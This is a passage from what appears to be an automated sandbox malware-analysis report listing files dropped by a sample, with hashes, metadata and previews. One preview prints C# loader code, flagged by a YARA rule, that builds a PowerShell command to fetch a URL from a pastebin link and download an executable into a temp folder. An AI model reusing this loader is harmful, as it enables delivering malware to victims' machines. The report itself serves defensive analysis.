Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1596
Entropy (8bit):	5.620109153867816
Encrypted:	false
SSDEEP:	48:MlaSU4y4RQmFoUeWmfmZ9tK8N/+HueOjlZS5G5Nz:MNHyIFKL3OZ2K/+nOZZ4ENz
MD5:	16980511050932433E0043497191FD2C
SHA1:	A187FFC9F7C3A10065D444201B2233ADA6AD58F8
SHA-256:	CF9179BE774B175198063FA7116BFF7726A2666115067E00959C1E6E944BE2B9
SHA-512:	F188DE2804286A18BE7D402219F8EAD933D31333E6F500AFC672ABA0F94E66042EE47824DA7E3B5D2AE1DB25A1C504A5AB7C3B7457943E3AB87EB3B812435F0A
Malicious:	false
Preview:	@...e...........d....................................@..........@...............M6.]..O....PI.&!.......System.Web.Extensions...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...

C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.0.cs

Download File

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	3608
Entropy (8bit):	4.674309527372753
Encrypted:	false
SSDEEP:	96:JoOUVpkXLZArHN58uJlPmqDXz9dkLMqF/E:qpk7QlRDXppEM
MD5:	9328E9B30EB919743B2E9739999335C3
SHA1:	E6CE274A36E5F78A2F46A6B92F534755E3938261
SHA-256:	3720A26EE04FADC5ECDC14C9FBF7A1C75AEA6F58029E1F6879CE9CAB8A0FAAB7
SHA-512:	79707E84492961B29C44F820F137E9D607F0DE5392C052018E79541754D412F5B798ADE0A6C621E17D7747FD385F913EAE4B077986612F984B31885E6919B87E
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.0.cs, Author: Joe Security
Preview:	.using System;..using System.Diagnostics;..using System.IO;..using System.Threading;....public class HomeP..{.. public static void GetLoader(string pastebinUrl).. {.. string tempExePath = Path.Combine("C:\\Windows\\Temp", Path.GetRandomFileName().Replace(".", "") + ".exe");.... string psCommandGetLink = "(New-Object System.Net.WebClient).DownloadString('" + pastebinUrl + "')";.... string psCommandDownloadExe = "(New-Object System.Net.WebClient).DownloadFile(" + psCommandGetLink + ", '" + tempExePath + "')";.... using (Process powerShell = new Process()).. {.. powerShell.StartInfo.FileName = "powershell";.. powerShell.StartInfo.Arguments = "-Command \"" + psCommandGetLink + "; " + psCommandDownloadExe + "\"";.. powerShell.StartInfo.RedirectStandardOutput = true;.. powerShell.StartInfo.RedirectStandardError = true;.. powerShell.StartInfo.UseShellExecute = false;.. powerShell.Start

C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.cmdline

Download File

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	183
Entropy (8bit):	5.074814871758469
Encrypted:	false
SSDEEP:	3:0HXEXA8F+H2R5BJ1Rt+kiE2J5xAIhOJXop1FaiQCIFRVRMxTPIt+kiE2J5xAIhO6:pAu+H2Lnwkn23fhsXs10zxszIwkn23f7
MD5:	3B1A6704A23BB004480C4AF5504357D3
SHA1:	5E55BF2C05E347FC912857B5A8F543D7835A26E7
SHA-256:	89A69DB4C4872FEFA9804C47DE82A374932BA7D75959A0CB5DC44A0E40CCBCF5
SHA-512:	B65BE4B24E45FF5374138DDF201C5C6570D77B366B1C9D3D0805238C3586ABCA60BA7CF9463BC1536C31DB8DA95F5A5408ED6E9AECA66FF5864BDDD1B54D5C86
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /out:"C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.0.cs"

C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	3.812263006288113
Encrypted:	false
SSDEEP:	96:xBvCxpv5oxxZzaigvVU5791c4VFekkhB69K:XvCxpGxPzai9W2EX
MD5:	E5720AE73F41937EF995036A71B38B48
SHA1:	E7F262D19305CF91B7CAF68A7A4251172C3ABDAD
SHA-256:	CECC8637967E2E86C78A2DE341CDFB27F5108EB76FDDE57087071130708EB0C7
SHA-512:	EA28BDBCDB9F0F70A0506A62BA62BFF8763EC02EAC649DAF0E1A470BCB57963F67217DB6F004DEE42BC55F71255C87FDCCD494B815AB1EA3C4443F90531FD082
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Ag...........!..................... ...@....... ....................................@..................................-..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B........................H........#..,............................................................0..M.......r...p(....r!..pr%..po....r'..p(....(.....r1..p.r...p(................r...p.........r...p.........r...p...(.....s......o....r...po.....o...............r...p.........r1..p.........r7..p...(....o.....o.....o.....o.....o.....o.....o.....o.....o.....o.....o.....o....&.o.......,..o.....s.........o.......o.......o.......o......(....o....*.........u..........0..........r;..p(....o.....r...p(....o.....

C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.out

Download File

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	681
Entropy (8bit):	5.249749424539672
Encrypted:	false
SSDEEP:	12:KJN/qR37LwfpsXsqQfpsXs2KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJBqdYfxfyKax5DqBVKVrdFAMBJTH
MD5:	8DE6A24B27C9B1EF40399591A6C7FF19
SHA1:	90B145042FA55407B88DC13B36A1C6516166B262
SHA-256:	D703329FFF07D26ECC2E398D7EBAC4AC790F3E4E7214CBA3BEDE2154D3E31073
SHA-512:	150708EFE5957F82DF39369EC099E86835E776F61BF0BAAAF82E6FBBDD26B8FD6E0DC1689A2FDFF49466341D21A16AD2E802883B1971F012A0C3F45B8D0C478F
Malicious:	false
Preview:	.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /out:"C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\1ixib5wl\CSC291E15774B6A482B9669CEACC9B56C.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.1040925935485912
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grytak7YnqqhPN5Dlq5J:+RI+ycuZhN/akShPNnqX
MD5:	DE23DFA76DCC0E8BF7EDA7665911510C
SHA1:	3B9C599F15D84DB767A6E42E987D07B06D1DF0DE
SHA-256:	E66761D638E2BAB240DA5919DA713E375C9DD5D288F746298E7E1CDE16F1945D
SHA-512:	91C51A5B0C83C32AEECE8812AD352691E265D5DAF450C8F48832CABCA1D12CAACC37EC278B5D1F2F9B2F7581F3E48A93D59ED407490CC400C542204F7EB7E1D7
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...1.i.x.i.b.5.w.l...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...1.i.x.i.b.5.w.l...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\RES42BA.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Sat Nov 23 13:09:39 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1328
Entropy (8bit):	3.9868602356341087
Encrypted:	false
SSDEEP:	24:HQMe9ERhfGbk7XDfHrWwKEbsmfII+ycuZhN/akShPNnqSqd:ZCk7zBKPmg1ul/a3TqSK
MD5:	23A2E637DCF4073EE7DF70D2D19573BF
SHA1:	5F76260594CD48384E523F4BA1277EF3B4D6BA93
SHA-256:	1C5DE2F4E4A0BB9F7B577A7C4A6D92FAB2684AB9681C35E9DDD7585A0BD8B3FB
SHA-512:	A73B36EBD5D9C76E0FC577CC216E8C2A2DC2544F0CEBFD74B466F9B00B106E2DB4731F9A91345422C08CCCE59F86C614E4E9DDA4459ACA9B3CE65C49B35AD120
Malicious:	false
Preview:	L.....Ag.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........R....c:\Users\user\AppData\Local\Temp\1ixib5wl\CSC291E15774B6A482B9669CEACC9B56C.TMP..................#.m.....fY.Q...........4.......C:\Users\user\AppData\Local\Temp\RES42BA.tmp.-.<....................a..Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...1.i.x.i.b.5.w.l...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

C:\Users\user\AppData\Local\Temp\RES4E05.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Sat Nov 23 13:09:42 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1328
Entropy (8bit):	3.990592659183095
Encrypted:	false
SSDEEP:	24:H17ge9E2+ftirq1YmXDfHlwKEbsmfII+ycuZhN7HOakSiHPPNnqSqd:UtjCmzmKPmg1ul7HOa3iHNqSK
MD5:	48CF49DD49E52E861F30F0F8F3AC7F56
SHA1:	F6F88E94342F69BB03B92ABE2201EE6140BCD09D
SHA-256:	A58831A0D3DDC59DBBC9F6C9DEFE4429ACC514EFC7F1A1FB98D4E175C63E8224
SHA-512:	1FA2D08B6F57BB73862661E17FB216C55E26BE711630EAABE291370013C9FBD66265C4250468211886BCBE68395B9E2D49D2CC762F957C6A3A4B648BD1AF8BE7
Malicious:	false
Preview:	L.....Ag.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\juqgin2j\CSCBFD98E15EAE94B1A9A3E8A6348847C3D.TMP................+l.....W.oc.`0...........4.......C:\Users\user\AppData\Local\Temp\RES4E05.tmp.-.<....................a..Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.u.q.g.i.n.2.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_13fc3ogo.uak.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_15jqxtjq.hkd.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1orbsapq.wyl.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2o43gfxp.h4v.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2sjpdqgj.h4g.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a05cgiua.zdo.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a52qms5h.fjq.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fqav4vig.c53.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_icvqyrfv.zpf.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kdbur53d.kdq.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kp5tco20.szp.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kviy4fw3.e32.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o0ckb41q.zwv.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ojrbkcgi.itt.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oqnzesou.fjq.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pndwk0xa.t55.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pxo3gpyr.d4u.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rqaz4qom.22v.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
